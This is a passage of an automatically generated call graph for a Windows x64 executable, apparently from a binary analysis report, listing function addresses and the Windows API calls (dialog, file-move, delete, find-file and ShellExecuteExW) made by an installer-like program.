26860->26865 26873 7ff720b5e7bb memcpy_s 26860->26873 26861 7ff720b38d04 33 API calls 26861->26963 26862->26866 26863 7ff720b31fa0 31 API calls 26863->26839 26867 7ff720b5eea4 26864->26867 26865->26873 26866->26863 26872 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26867->26872 26869 7ff720b5a988 33 API calls 26869->26963 26870 7ff720b32034 33 API calls 26870->26963 26871 7ff720b5eeec 27252 7ff720b32004 33 API calls std::_Xinvalid_argument 26871->27252 26877 7ff720b5eeaa 26872->26877 26881 7ff720b320b0 33 API calls 26873->26881 26921 7ff720b5eb0f 26873->26921 26875 7ff720b31fa0 31 API calls 26875->26837 26876 7ff720b5eef8 27254 7ff720b32004 33 API calls std::_Xinvalid_argument 26876->27254 26886 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26877->26886 26878 7ff720b5eef2 27253 7ff720b31f80 33 API calls 3 library calls 26878->27253 26880 7ff720b5eee6 27251 7ff720b31f80 33 API calls 3 library calls 26880->27251 26888 7ff720b5e8e3 26881->26888 26885 7ff720b5ebaa 26885->26871 26885->26880 26895 7ff720b5ebf2 memcpy_s 26885->26895 26902 7ff720b5ecbb memcpy_s 26885->26902 26904 7ff720b62150 33 API calls 26885->26904 26893 7ff720b5eeb0 26886->26893 26887 7ff720b32674 31 API calls 26887->26963 26896 7ff720b5eee0 26888->26896 26903 7ff720b3129c 33 API calls 26888->26903 26891 7ff720b5ecc0 26891->26876 26891->26878 26891->26902 26907 7ff720b62150 33 API calls 26891->26907 26892 7ff720b3e174 33 API calls 26892->26963 26908 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26893->26908 27152 7ff720b5f460 26895->27152 27250 7ff720b3704c 47 API calls memcpy_s 26896->27250 26898 7ff720b5d569 GetDlgItem 26905 7ff720b32520 SetWindowTextW 26898->26905 26900 7ff720b59948 31 API calls 26900->26963 26902->26875 26909 7ff720b5e926 26903->26909 26904->26895 26910 7ff720b5d588 SendMessageW 26905->26910 26907->26902 26911 7ff720b5eeb6 26908->26911 27240 7ff720b4d1e8 26909->27240 26910->26963 26916 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26911->26916 26914 7ff720b45b20 53 API calls 26914->26963 26915 7ff720b4dba8 33 API calls 26915->26963 26920 7ff720b5eebc 26916->26920 26917 7ff720b5d5bc SendMessageW 26917->26963 26919 7ff720b43ef0 54 API calls 26919->26963 26924 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26920->26924 26921->26885 26921->26891 26927 7ff720b5eed4 26921->26927 26929 7ff720b5eeda 26921->26929 26928 7ff720b5eec2 26924->26928 26926 7ff720b3129c 33 API calls 26954 7ff720b5e951 26926->26954 26930 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26927->26930 26934 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26928->26934 26933 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26929->26933 26930->26929 26931 7ff720b34228 33 API calls 26931->26963 26933->26896 26937 7ff720b5eec8 26934->26937 26935 7ff720b457e0 33 API calls 26935->26963 26936 7ff720b43268 51 API calls 26936->26963 26938 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26937->26938 26941 7ff720b5eece 26938->26941 26939 7ff720b45a68 33 API calls 26939->26963 26940 7ff720b3250c SetDlgItemTextW 26940->26963 26945 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 26941->26945 26943 7ff720b47db4 47 API calls 26943->26963 26944 7ff720b31150 33 API calls 26944->26963 26945->26927 26946 7ff720b51344 CompareStringW 26946->26954 26948 7ff720b31fa0 31 API calls 26948->26954 26950 7ff720b31fa0 31 API calls 26950->26963 26951 7ff720b5df19 EndDialog 26951->26963 26953 7ff720b4327c 51 API calls 26953->26963 26954->26921 26954->26926 26954->26937 26954->26941 26954->26946 26954->26948 26955 7ff720b4d1e8 33 API calls 26954->26955 26955->26954 26956 7ff720b5daa1 MoveFileW 26957 7ff720b5dad5 MoveFileExW 26956->26957 26958 7ff720b5daf0 26956->26958 26957->26958 26959 7ff720b31fa0 31 API calls 26958->26959 26958->26963 26959->26958 26960 7ff720b42f18 56 API calls 26960->26963 26961 7ff720b320b0 33 API calls 26961->26963 26963->26816 26963->26819 26963->26822 26963->26825 26963->26827 26963->26829 26963->26832 26963->26833 26963->26837 26963->26838 26963->26842 26963->26847 26963->26848 26963->26851 26963->26854 26963->26858 26963->26859 26963->26860 26963->26861 26963->26867 26963->26869 26963->26870 26963->26877 26963->26887 26963->26892 26963->26893 26963->26900 26963->26911 26963->26914 26963->26915 26963->26917 26963->26919 26963->26920 26963->26928 26963->26931 26963->26935 26963->26936 26963->26939 26963->26940 26963->26943 26963->26944 26963->26950 26963->26951 26963->26953 26963->26956 26963->26960 26963->26961 27113 7ff720b51344 CompareStringW 26963->27113 27114 7ff720b5a3c0 26963->27114 27190 7ff720b4cf60 35 API calls _invalid_parameter_noinfo_noreturn 26963->27190 27191 7ff720b59534 33 API calls Concurrency::cancel_current_task 26963->27191 27192 7ff720b60604 31 API calls _invalid_parameter_noinfo_noreturn 26963->27192 27193 7ff720b3df5c 47 API calls memcpy_s 26963->27193 27194 7ff720b5a7b4 33 API calls _invalid_parameter_noinfo_noreturn 26963->27194 27195 7ff720b59498 33 API calls 26963->27195 27196 7ff720b5ab68 33 API calls 3 library calls 26963->27196 27197 7ff720b47328 33 API calls 2 library calls 26963->27197 27198 7ff720b44048 33 API calls 26963->27198 27199 7ff720b43cf4 26963->27199 27213 7ff720b46570 33 API calls 3 library calls 26963->27213 27214 7ff720b4728c 26963->27214 27218 7ff720b31744 33 API calls 4 library calls 26963->27218 27219 7ff720b4317c 26963->27219 27233 7ff720b43e60 FindClose 26963->27233 27234 7ff720b51374 CompareStringW 26963->27234 27235 7ff720b59c50 47 API calls 26963->27235 27236 7ff720b58758 51 API calls 3 library calls 26963->27236 27237 7ff720b5aad4 33 API calls _handle_error 26963->27237 27238 7ff720b45ac8 CompareStringW 26963->27238 27239 7ff720b47e70 47 API calls 26963->27239 26965 7ff720b5f923 26964->26965 26966 7ff720b320b0 33 API calls 26965->26966 26968 7ff720b5f939 26966->26968 26967 7ff720b5f96e 27266 7ff720b3e35c 26967->27266 26968->26967 26969 7ff720b320b0 33 API calls 26968->26969 26969->26967 26971 7ff720b5f9cb 27286 7ff720b3e7b8 26971->27286 26973 7ff720b5f9d6 26974 7ff720b622a0 _handle_error 8 API calls 26973->26974 26975 7ff720b5bbd2 26974->26975 26975->26618 26978 7ff720b5841c 4 API calls 26977->26978 26979 7ff720b5f33f 26978->26979 26980 7ff720b5f437 26979->26980 26981 7ff720b5f347 GetWindow 26979->26981 26982 7ff720b622a0 _handle_error 8 API calls 26980->26982 26986 7ff720b5f362 26981->26986 26983 7ff720b5be1b 26982->26983 26983->26377 26983->26378 26984 7ff720b5f36e GetClassNameW 28267 7ff720b51344 CompareStringW 26984->28267 26986->26980 26986->26984 26987 7ff720b5f397 GetWindowLongPtrW 26986->26987 26988 7ff720b5f416 GetWindow 26986->26988 26987->26988 26989 7ff720b5f3a9 SendMessageW 26987->26989 26988->26980 26988->26986 26989->26988 26990 7ff720b5f3c5 GetObjectW 26989->26990 28268 7ff720b58484 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26990->28268 26992 7ff720b5844c 4 API calls 26993 7ff720b5f3e1 26992->26993 26993->26992 28269 7ff720b58d74 16 API calls _handle_error 26993->28269 26995 7ff720b5f3f9 SendMessageW DeleteObject 26995->26988 26997 7ff720b3252a SetWindowTextW 26996->26997 26998 7ff720b32527 26996->26998 26999 7ff720b9e2e0 26997->26999 26998->26997 27000->26402 27001->26469 27003 7ff720b4327c 51 API calls 27002->27003 27004 7ff720b43271 27003->27004 27004->26482 27004->26505 27005->26482 27007 7ff720b4b8ee 27006->27007 27009 7ff720b4b90b 27006->27009 27008 7ff720b4b928 102 API calls 27007->27008 27008->27009 27009->26562 27010->26589 27011->26601 27012->26611 27013->26625 27015 7ff720b635a0 27014->27015 27015->26629 27016->26545 27018 7ff720b31177 27017->27018 27019 7ff720b32034 33 API calls 27018->27019 27020 7ff720b31185 memcpy_s 27019->27020 27020->26560 27021->26582 27022->26649 27023->26674 27024->26689 27025->26701 27027 7ff720b43de8 swprintf 46 API calls 27026->27027 27028 7ff720b4a4c9 27027->27028 27029 7ff720b50ee8 WideCharToMultiByte 27028->27029 27031 7ff720b4a4d9 27029->27031 27030 7ff720b4a549 27051 7ff720b493c8 27030->27051 27031->27030 27045 7ff720b497c0 31 API calls 27031->27045 27049 7ff720b4a52a SetDlgItemTextW 27031->27049 27034 7ff720b4a5c3 27036 7ff720b4a5cc GetWindowLongPtrW 27034->27036 27037 7ff720b4a682 27034->27037 27035 7ff720b4a6b2 GetSystemMetrics GetWindow 27038 7ff720b4a7e1 27035->27038 27046 7ff720b4a6dd 27035->27046 27040 7ff720b9e2c0 27036->27040 27066 7ff720b49568 27037->27066 27039 7ff720b622a0 _handle_error 8 API calls 27038->27039 27042 7ff720b4a7f0 27039->27042 27043 7ff720b4a66a GetWindowRect 27040->27043 27042->26714 27043->27037 27045->27031 27046->27038 27047 7ff720b4a6fe GetWindowRect 27046->27047 27050 7ff720b4a7c0 GetWindow 27046->27050 27047->27046 27048 7ff720b4a6a5 SetWindowTextW 27048->27035 27049->27031 27050->27038 27050->27046 27052 7ff720b49568 47 API calls 27051->27052 27056 7ff720b4940f 27052->27056 27053 7ff720b4951a 27054 7ff720b622a0 _handle_error 8 API calls 27053->27054 27055 7ff720b4954e GetWindowRect GetClientRect 27054->27055 27055->27034 27055->27035 27056->27053 27057 7ff720b3129c 33 API calls 27056->27057 27058 7ff720b4945c 27057->27058 27059 7ff720b3129c 33 API calls 27058->27059 27065 7ff720b49561 27058->27065 27061 7ff720b494d4 27059->27061 27060 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27062 7ff720b49567 27060->27062 27061->27053 27063 7ff720b4955c 27061->27063 27064 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27063->27064 27064->27065 27065->27060 27067 7ff720b43de8 swprintf 46 API calls 27066->27067 27068 7ff720b495ab 27067->27068 27069 7ff720b50ee8 WideCharToMultiByte 27068->27069 27070 7ff720b495c3 27069->27070 27071 7ff720b497c0 31 API calls 27070->27071 27072 7ff720b495db 27071->27072 27073 7ff720b622a0 _handle_error 8 API calls 27072->27073 27074 7ff720b495eb 27073->27074 27074->27035 27074->27048 27076 7ff720b313a4 33 API calls 27075->27076 27077 7ff720b32462 GetWindowTextW 27076->27077 27078 7ff720b32494 27077->27078 27079 7ff720b3129c 33 API calls 27078->27079 27080 7ff720b324a2 27079->27080 27081 7ff720b324dd 27080->27081 27083 7ff720b32505 27080->27083 27082 7ff720b622a0 _handle_error 8 API calls 27081->27082 27084 7ff720b324f3 27082->27084 27085 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27083->27085 27084->26723 27086 7ff720b3250a 27085->27086 27087->26740 27089->26748 27091 7ff720b5adbc GetMessageW 27090->27091 27092 7ff720b5ae00 GetDlgItem 27090->27092 27093 7ff720b5addb IsDialogMessageW 27091->27093 27094 7ff720b5adea TranslateMessage DispatchMessageW 27091->27094 27092->26759 27092->26760 27093->27092 27093->27094 27094->27092 27095->26781 27096->26779 27098 7ff720b3713b 27097->27098 27099 7ff720b37206 27097->27099 27105 7ff720b3714b memcpy_s 27098->27105 27106 7ff720b33f48 33 API calls 2 library calls 27098->27106 27107 7ff720b3704c 47 API calls memcpy_s 27099->27107 27102 7ff720b3720b 27103 7ff720b37273 27102->27103 27108 7ff720b3889c 8 API calls memcpy_s 27102->27108 27103->26797 27105->26797 27106->27105 27107->27102 27108->27102 27110 7ff720b5a9b6 27109->27110 27111 7ff720b5a9af 27109->27111 27110->27111 27255 7ff720b31744 33 API calls 4 library calls 27110->27255 27111->26963 27113->26963 27115 7ff720b5a686 27114->27115 27116 7ff720b5a3ff 27114->27116 27118 7ff720b622a0 _handle_error 8 API calls 27115->27118 27256 7ff720b5cd78 33 API calls 27116->27256 27120 7ff720b5a697 27118->27120 27119 7ff720b5a41e 27121 7ff720b3129c 33 API calls 27119->27121 27120->26898 27122 7ff720b5a45e 27121->27122 27123 7ff720b3129c 33 API calls 27122->27123 27124 7ff720b5a497 27123->27124 27125 7ff720b3129c 33 API calls 27124->27125 27126 7ff720b5a4ca 27125->27126 27257 7ff720b5a7b4 33 API calls _invalid_parameter_noinfo_noreturn 27126->27257 27128 7ff720b5a6b4 27130 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27128->27130 27129 7ff720b5a4f3 27129->27128 27131 7ff720b5a6ba 27129->27131 27132 7ff720b5a6c0 27129->27132 27135 7ff720b320b0 33 API calls 27129->27135 27136 7ff720b5a605 27129->27136 27130->27131 27133 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27131->27133 27134 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27132->27134 27133->27132 27137 7ff720b5a6c6 27134->27137 27135->27136 27136->27115 27136->27137 27138 7ff720b5a6af 27136->27138 27139 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27137->27139 27141 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27138->27141 27140 7ff720b5a6cc 27139->27140 27142 7ff720b3255c 61 API calls 27140->27142 27141->27128 27143 7ff720b5a715 27142->27143 27144 7ff720b5a731 27143->27144 27145 7ff720b5a781 SetDlgItemTextW 27143->27145 27149 7ff720b5a721 27143->27149 27146 7ff720b622a0 _handle_error 8 API calls 27144->27146 27145->27144 27147 7ff720b5a7a7 27146->27147 27147->26898 27148 7ff720b5a72d 27148->27144 27150 7ff720b5a737 EndDialog 27148->27150 27149->27144 27149->27148 27151 7ff720b4babc 102 API calls 27149->27151 27150->27144 27151->27148 27159 7ff720b5f4a9 memcpy_s 27152->27159 27170 7ff720b5f7fd 27152->27170 27153 7ff720b31fa0 31 API calls 27154 7ff720b5f81c 27153->27154 27155 7ff720b622a0 _handle_error 8 API calls 27154->27155 27156 7ff720b5f828 27155->27156 27156->26902 27157 7ff720b5f604 27160 7ff720b3129c 33 API calls 27157->27160 27159->27157 27258 7ff720b51344 CompareStringW 27159->27258 27161 7ff720b5f640 27160->27161 27162 7ff720b43268 51 API calls 27161->27162 27163 7ff720b5f64a 27162->27163 27164 7ff720b31fa0 31 API calls 27163->27164 27167 7ff720b5f655 27164->27167 27165 7ff720b5f6c2 ShellExecuteExW 27166 7ff720b5f7c6 27165->27166 27171 7ff720b5f6d5 27165->27171 27166->27170 27173 7ff720b5f87b 27166->27173 27167->27165 27169 7ff720b3129c 33 API calls 27167->27169 27168 7ff720b5f70e 27260 7ff720b5fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27168->27260 27172 7ff720b5f697 27169->27172 27170->27153 27171->27168 27174 7ff720b5f763 CloseHandle 27171->27174 27179 7ff720b5f701 ShowWindow 27171->27179 27259 7ff720b45b20 53 API calls 2 library calls 27172->27259 27176 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27173->27176 27177 7ff720b5f781 27174->27177 27178 7ff720b5f772 27174->27178 27182 7ff720b5f880 27176->27182 27177->27166 27186 7ff720b5f7b7 ShowWindow 27177->27186 27261 7ff720b51344 CompareStringW 27178->27261 27179->27168 27181 7ff720b5f6a5 27185 7ff720b31fa0 31 API calls 27181->27185 27184 7ff720b5f726 27184->27174 27188 7ff720b5f734 GetExitCodeProcess 27184->27188 27187 7ff720b5f6af 27185->27187 27186->27166 27187->27165 27188->27174 27189 7ff720b5f747 27188->27189 27189->27174 27190->26963 27191->26963 27192->26963 27193->26963 27194->26963 27195->26963 27196->26963 27197->26963 27198->26963 27200 7ff720b43d1e SetFileAttributesW 27199->27200 27201 7ff720b43d1b 27199->27201 27202 7ff720b43d34 27200->27202 27209 7ff720b43db5 27200->27209 27201->27200 27203 7ff720b469cc 49 API calls 27202->27203 27205 7ff720b43d59 27203->27205 27204 7ff720b622a0 _handle_error 8 API calls 27206 7ff720b43dca 27204->27206 27207 7ff720b43d5d SetFileAttributesW 27205->27207 27208 7ff720b43d7c 27205->27208 27206->26963 27207->27208 27208->27209 27210 7ff720b43dda 27208->27210 27209->27204 27211 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27210->27211 27212 7ff720b43ddf 27211->27212 27213->26963 27215 7ff720b472aa 27214->27215 27262 7ff720b3b3b8 27215->27262 27218->26963 27220 7ff720b431a7 DeleteFileW 27219->27220 27221 7ff720b431a4 27219->27221 27222 7ff720b431bd 27220->27222 27223 7ff720b4323c 27220->27223 27221->27220 27225 7ff720b469cc 49 API calls 27222->27225 27224 7ff720b622a0 _handle_error 8 API calls 27223->27224 27226 7ff720b43251 27224->27226 27227 7ff720b431e2 27225->27227 27226->26963 27228 7ff720b431e6 DeleteFileW 27227->27228 27229 7ff720b43203 27227->27229 27228->27229 27229->27223 27230 7ff720b43261 27229->27230 27231 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27230->27231 27232 7ff720b43266 27231->27232 27234->26963 27235->26963 27236->26963 27237->26963 27238->26963 27239->26963 27242 7ff720b4d21a 27240->27242 27241 7ff720b4d24d 27241->26954 27242->27241 27243 7ff720b31744 33 API calls 27242->27243 27243->27242 27244->26853 27245->26841 27247->26822 27248->26825 27249->26827 27250->26880 27251->26871 27253->26876 27255->27110 27256->27119 27257->27129 27258->27157 27259->27181 27260->27184 27261->27177 27265 7ff720b3b402 memcpy_s 27262->27265 27263 7ff720b622a0 _handle_error 8 API calls 27264 7ff720b3b4c6 27263->27264 27264->26963 27265->27263 27300 7ff720b486ac 27266->27300 27268 7ff720b3e3d4 27306 7ff720b3e610 31 API calls memcpy_s 27268->27306 27270 7ff720b3e4e4 27273 7ff720b62150 33 API calls 27270->27273 27271 7ff720b3e559 27274 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27271->27274 27272 7ff720b3e464 27272->27270 27272->27271 27275 7ff720b3e500 27273->27275 27283 7ff720b3e55e 27274->27283 27307 7ff720b530c8 102 API calls 27275->27307 27277 7ff720b3e52d 27278 7ff720b622a0 _handle_error 8 API calls 27277->27278 27279 7ff720b3e53d 27278->27279 27279->26971 27280 7ff720b4187a 27282 7ff720b418c5 27280->27282 27284 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27280->27284 27281 7ff720b31fa0 31 API calls 27281->27283 27282->26971 27283->27280 27283->27281 27283->27282 27285 7ff720b418f3 27284->27285 27287 7ff720b3e7fa 27286->27287 27288 7ff720b3e874 27287->27288 27290 7ff720b3e8b1 27287->27290 27308 7ff720b43e88 27287->27308 27288->27290 27291 7ff720b3e9a3 27288->27291 27297 7ff720b3e910 27290->27297 27315 7ff720b3f588 27290->27315 27292 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27291->27292 27294 7ff720b3e9a8 27292->27294 27293 7ff720b622a0 _handle_error 8 API calls 27296 7ff720b3e98e 27293->27296 27296->26973 27299 7ff720b3e965 27297->27299 27351 7ff720b328a4 82 API calls 2 library calls 27297->27351 27299->27293 27301 7ff720b486ca 27300->27301 27302 7ff720b62150 33 API calls 27301->27302 27304 7ff720b486ef 27302->27304 27303 7ff720b62150 33 API calls 27305 7ff720b48719 27303->27305 27304->27303 27305->27268 27306->27272 27307->27277 27309 7ff720b4728c 8 API calls 27308->27309 27310 7ff720b43ea1 27309->27310 27314 7ff720b43ecf 27310->27314 27352 7ff720b4407c 27310->27352 27313 7ff720b43eba FindClose 27313->27314 27314->27287 27316 7ff720b3f5a8 _snwprintf 27315->27316 27378 7ff720b32950 27316->27378 27319 7ff720b3f5dc 27323 7ff720b3f60c 27319->27323 27393 7ff720b333e4 27319->27393 27322 7ff720b3f608 27322->27323 27425 7ff720b33ad8 27322->27425 27641 7ff720b32c54 27323->27641 27330 7ff720b3f7db 27435 7ff720b3f8b4 27330->27435 27332 7ff720b38d04 33 API calls 27333 7ff720b3f672 27332->27333 27661 7ff720b478d8 48 API calls 2 library calls 27333->27661 27335 7ff720b3f687 27337 7ff720b43e88 55 API calls 27335->27337 27345 7ff720b3f6bd 27337->27345 27338 7ff720b3f852 27338->27323 27456 7ff720b369f8 27338->27456 27467 7ff720b3f940 27338->27467 27343 7ff720b3f8aa 27346 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27343->27346 27344 7ff720b3f75d 27344->27330 27344->27343 27347 7ff720b3f8a5 27344->27347 27345->27343 27345->27344 27348 7ff720b43e88 55 API calls 27345->27348 27662 7ff720b478d8 48 API calls 2 library calls 27345->27662 27350 7ff720b3f8b0 27346->27350 27349 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27347->27349 27348->27345 27349->27343 27351->27299 27353 7ff720b440b9 FindFirstFileW 27352->27353 27354 7ff720b44192 FindNextFileW 27352->27354 27357 7ff720b441b3 27353->27357 27358 7ff720b440de 27353->27358 27356 7ff720b441a1 GetLastError 27354->27356 27354->27357 27376 7ff720b44180 27356->27376 27359 7ff720b441d1 27357->27359 27361 7ff720b320b0 33 API calls 27357->27361 27360 7ff720b469cc 49 API calls 27358->27360 27365 7ff720b3129c 33 API calls 27359->27365 27363 7ff720b44104 27360->27363 27361->27359 27362 7ff720b622a0 _handle_error 8 API calls 27366 7ff720b43eb4 27362->27366 27364 7ff720b44108 FindFirstFileW 27363->27364 27368 7ff720b44127 27363->27368 27364->27368 27367 7ff720b441fb 27365->27367 27366->27313 27366->27314 27370 7ff720b48050 47 API calls 27367->27370 27368->27357 27369 7ff720b4416f GetLastError 27368->27369 27371 7ff720b442d4 27368->27371 27369->27376 27372 7ff720b44209 27370->27372 27373 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27371->27373 27375 7ff720b442cf 27372->27375 27372->27376 27374 7ff720b442da 27373->27374 27377 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27375->27377 27376->27362 27377->27371 27379 7ff720b3296c 27378->27379 27380 7ff720b486ac 33 API calls 27379->27380 27381 7ff720b3298d 27380->27381 27382 7ff720b62150 33 API calls 27381->27382 27387 7ff720b32ac2 27381->27387 27383 7ff720b32ab0 27382->27383 27386 7ff720b391c8 35 API calls 27383->27386 27383->27387 27386->27387 27663 7ff720b44cc4 27387->27663 27388 7ff720b42c68 27392 7ff720b42480 54 API calls 27388->27392 27389 7ff720b42c81 27391 7ff720b42c85 27389->27391 27677 7ff720b3b7f8 99 API calls 2 library calls 27389->27677 27391->27319 27392->27389 27422 7ff720b42890 104 API calls 27393->27422 27394 7ff720b33674 27678 7ff720b328a4 82 API calls 2 library calls 27394->27678 27395 7ff720b33431 memcpy_s 27403 7ff720b3344e 27395->27403 27406 7ff720b33601 27395->27406 27420 7ff720b42b70 101 API calls 27395->27420 27397 7ff720b369f8 132 API calls 27399 7ff720b33682 27397->27399 27398 7ff720b334cc 27424 7ff720b42890 104 API calls 27398->27424 27399->27397 27400 7ff720b3370c 27399->27400 27399->27406 27416 7ff720b42a60 101 API calls 27399->27416 27405 7ff720b33740 27400->27405 27400->27406 27679 7ff720b328a4 82 API calls 2 library calls 27400->27679 27402 7ff720b335cb 27402->27403 27404 7ff720b335d7 27402->27404 27403->27394 27403->27399 27404->27406 27408 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27404->27408 27405->27406 27407 7ff720b3384d 27405->27407 27418 7ff720b42b70 101 API calls 27405->27418 27406->27322 27407->27406 27410 7ff720b320b0 33 API calls 27407->27410 27411 7ff720b33891 27408->27411 27409 7ff720b334eb 27409->27402 27421 7ff720b42a60 101 API calls 27409->27421 27410->27406 27411->27322 27412 7ff720b335a7 27412->27402 27417 7ff720b42890 104 API calls 27412->27417 27413 7ff720b369f8 132 API calls 27414 7ff720b3378e 27413->27414 27414->27413 27415 7ff720b33803 27414->27415 27419 7ff720b42a60 101 API calls 27414->27419 27423 7ff720b42a60 101 API calls 27415->27423 27416->27399 27417->27402 27418->27414 27419->27414 27420->27398 27421->27412 27422->27395 27423->27407 27424->27409 27426 7ff720b33af9 27425->27426 27432 7ff720b33b55 27425->27432 27680 7ff720b33378 27426->27680 27428 7ff720b622a0 _handle_error 8 API calls 27430 7ff720b33b67 27428->27430 27430->27330 27430->27332 27431 7ff720b33b6c 27433 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27431->27433 27432->27428 27434 7ff720b33b71 27433->27434 27931 7ff720b4882c 27435->27931 27437 7ff720b3f8ca 27935 7ff720b4eee0 GetSystemTime SystemTimeToFileTime 27437->27935 27440 7ff720b50914 27441 7ff720b602c0 27440->27441 27442 7ff720b47db4 47 API calls 27441->27442 27443 7ff720b602f3 27442->27443 27444 7ff720b4aaa0 48 API calls 27443->27444 27445 7ff720b60307 27444->27445 27446 7ff720b4da14 48 API calls 27445->27446 27447 7ff720b60317 27446->27447 27448 7ff720b31fa0 31 API calls 27447->27448 27449 7ff720b60322 27448->27449 27944 7ff720b5fbe8 49 API calls 2 library calls 27449->27944 27451 7ff720b60338 27452 7ff720b31fa0 31 API calls 27451->27452 27453 7ff720b60343 27452->27453 27454 7ff720b622a0 _handle_error 8 API calls 27453->27454 27455 7ff720b60350 27454->27455 27455->27338 27457 7ff720b36a0e 27456->27457 27465 7ff720b36a0a 27456->27465 27466 7ff720b42b70 101 API calls 27457->27466 27458 7ff720b36a1b 27459 7ff720b36a3e 27458->27459 27460 7ff720b36a2f 27458->27460 28007 7ff720b35138 130 API calls 2 library calls 27459->28007 27460->27465 27945 7ff720b35e2c 27460->27945 27463 7ff720b36a3c 27463->27465 28008 7ff720b3466c 82 API calls 27463->28008 27465->27338 27466->27458 27468 7ff720b3f988 27467->27468 27474 7ff720b3f9c0 27468->27474 27502 7ff720b3fa44 27468->27502 28137 7ff720b560ac 137 API calls 3 library calls 27468->28137 27470 7ff720b41141 27471 7ff720b41199 27470->27471 27472 7ff720b41146 27470->27472 27471->27502 28181 7ff720b560ac 137 API calls 3 library calls 27471->28181 27472->27502 28180 7ff720b3dd18 179 API calls 27472->28180 27473 7ff720b622a0 _handle_error 8 API calls 27475 7ff720b4117c 27473->27475 27474->27470 27478 7ff720b3f9e0 27474->27478 27474->27502 27475->27338 27478->27502 28038 7ff720b39bb0 27478->28038 27480 7ff720b3fae6 28051 7ff720b45eb8 27480->28051 27484 7ff720b3fb8a 27640 7ff720b42a60 101 API calls 27484->27640 27485 7ff720b3fb6e 27485->27484 27487 7ff720b3fbe7 27502->27473 27640->27487 27642 7ff720b32c88 27641->27642 27643 7ff720b32c74 27641->27643 27644 7ff720b31fa0 31 API calls 27642->27644 27643->27642 28262 7ff720b32d80 108 API calls _invalid_parameter_noinfo_noreturn 27643->28262 27648 7ff720b32ca1 27644->27648 27647 7ff720b32d08 28247 7ff720b33090 31 API calls _invalid_parameter_noinfo_noreturn 27647->28247 27660 7ff720b32d64 27648->27660 28246 7ff720b33090 31 API calls _invalid_parameter_noinfo_noreturn 27648->28246 27650 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27651 7ff720b32d7c 27650->27651 27652 7ff720b32d14 27653 7ff720b31fa0 31 API calls 27652->27653 27654 7ff720b32d20 27653->27654 28248 7ff720b4874c 27654->28248 27660->27650 27661->27335 27662->27345 27664 7ff720b44cf2 memcpy_s 27663->27664 27673 7ff720b44b6c 27664->27673 27666 7ff720b44d14 27667 7ff720b44d50 27666->27667 27669 7ff720b44d6e 27666->27669 27668 7ff720b622a0 _handle_error 8 API calls 27667->27668 27670 7ff720b32b32 27668->27670 27671 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27669->27671 27670->27319 27670->27388 27672 7ff720b44d73 27671->27672 27674 7ff720b44be7 27673->27674 27676 7ff720b44bef memcpy_s 27673->27676 27675 7ff720b31fa0 31 API calls 27674->27675 27675->27676 27676->27666 27677->27391 27678->27406 27679->27405 27681 7ff720b3339a 27680->27681 27682 7ff720b33396 27680->27682 27686 7ff720b33294 27681->27686 27682->27431 27682->27432 27685 7ff720b42a60 101 API calls 27685->27682 27687 7ff720b332bb 27686->27687 27689 7ff720b332f6 27686->27689 27688 7ff720b369f8 132 API calls 27687->27688 27692 7ff720b332db 27688->27692 27694 7ff720b36e74 27689->27694 27692->27685 27698 7ff720b36e95 27694->27698 27695 7ff720b369f8 132 API calls 27695->27698 27696 7ff720b3331d 27696->27692 27699 7ff720b33904 27696->27699 27698->27695 27698->27696 27726 7ff720b4e784 27698->27726 27734 7ff720b36a7c 27699->27734 27702 7ff720b3396a 27706 7ff720b33989 27702->27706 27707 7ff720b3399a 27702->27707 27703 7ff720b33a8a 27705 7ff720b622a0 _handle_error 8 API calls 27703->27705 27709 7ff720b33a9e 27705->27709 27775 7ff720b50cd4 33 API calls 27706->27775 27710 7ff720b339ec 27707->27710 27711 7ff720b339a3 27707->27711 27709->27692 27777 7ff720b326b4 33 API calls memcpy_s 27710->27777 27776 7ff720b50c00 33 API calls 27711->27776 27712 7ff720b33ab3 27713 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27712->27713 27715 7ff720b33ab8 27713->27715 27719 7ff720b67884 _invalid_parameter_noinfo_noreturn 31 API calls 27715->27719 27716 7ff720b339b0 27720 7ff720b31fa0 31 API calls 27716->27720 27724 7ff720b339c0 memcpy_s 27716->27724 27718 7ff720b33a13 27778 7ff720b50a68 34 API calls _invalid_parameter_noinfo_noreturn 27718->27778 27723 7ff720b33abe 27719->27723 27720->27724 27721 7ff720b31fa0 31 API calls 27725 7ff720b3394f 27721->27725 27724->27721 27725->27703 27725->27712 27725->27715 27727 7ff720b4e78d 27726->27727 27728 